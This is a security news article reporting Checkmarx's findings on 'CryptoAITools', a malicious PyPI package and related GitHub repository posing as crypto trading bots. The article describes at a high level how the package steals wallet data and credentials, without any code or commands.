Researchers Uncover Python Package Targeting Crypto Wallets with Malicious Code

Cybersecurity researchers have uncovered a hazardous Python package named “CryptoAITools,” which disguises itself as a cryptocurrency trading tool while containing malicious features aimed at stealing sensitive information and draining assets from crypto wallets. This package was disseminated through the Python Package Index (PyPI) and counterfeit GitHub repositories, accumulating more than 1,300 downloads before its removal from PyPI.

The malware initiates its harmful actions automatically upon installation, targeting both Windows and macOS platforms. According to a report from Checkmarx, it employs a deceptive graphical user interface (GUI) designed to distract victims while executing malicious activities in the background. The core of the malware’s operation resides within the “__init__.py” file, which incorporates code to identify the operating system, allowing it to deploy the appropriate harmful components.

Notably, the malware initiates a multi-stage infection process by injecting helper functionality capable of downloading additional payloads. These payloads are sourced from a counterfeit website, “coinsw[.]app,” which falsely advertises a cryptocurrency trading bot service. This strategy not only aids the cybercriminals in evading detection but also permits them to modify the malware’s functionalities by altering the payloads hosted on the seemingly legitimate website.

The infection mechanism also includes a GUI element that misleads victims during what appears to be a setup process, while the malware surreptitiously collects sensitive information from the compromised systems. Checkmarx highlighted that the primary objective of the CryptoAITools malware is extensive data theft, targeting a multitude of sensitive details critical for stealing cryptocurrency assets. This encompasses information from various cryptocurrency wallets (such as Bitcoin, Ethereum, and others), saved passwords, browser cookies, browsing history, financial data, and even Telegram messages.

For macOS users, the malware goes a step further by extracting data from Apple’s Notes and Stickies applications. Once the nefarious data has been gathered, it is uploaded to the gofile[.]io file transfer service, and the local copies are subsequently erased to eliminate any trace of the theft.

Additionally, the same stealer malware has been distributed via a related GitHub repository dubbed Meme Token Hunter Bot, purportedly an AI-driven trading bot for listing meme tokens on the Solana network. This repository remains operational and has garnered interest, being forked once and receiving ten stars, indicating an ongoing risk for users who may run the code directly from GitHub.

The attackers also maintain a Telegram channel that promotes the malicious GitHub repository while offering subscriptions and technical support, further extending their reach within the cryptocurrency community. This multi-platform distribution strategy allows the attackers to engage potential victims across different venues, capitalizing on user trust in varying platforms.

The implications of the CryptoAITools malware campaign are substantial, potentially detrimental not only to individual victims but also to the broader cryptocurrency ecosystem. Those who engaged with or interacted with the malicious “Meme-Token-Hunter-Bot” repository face heightened risks, showcasing the extensive impact of this cyber threat. The findings underscore the pressing need for vigilance and proactive measures within the cryptocurrency community to safeguard sensitive information against such sophisticated attacks.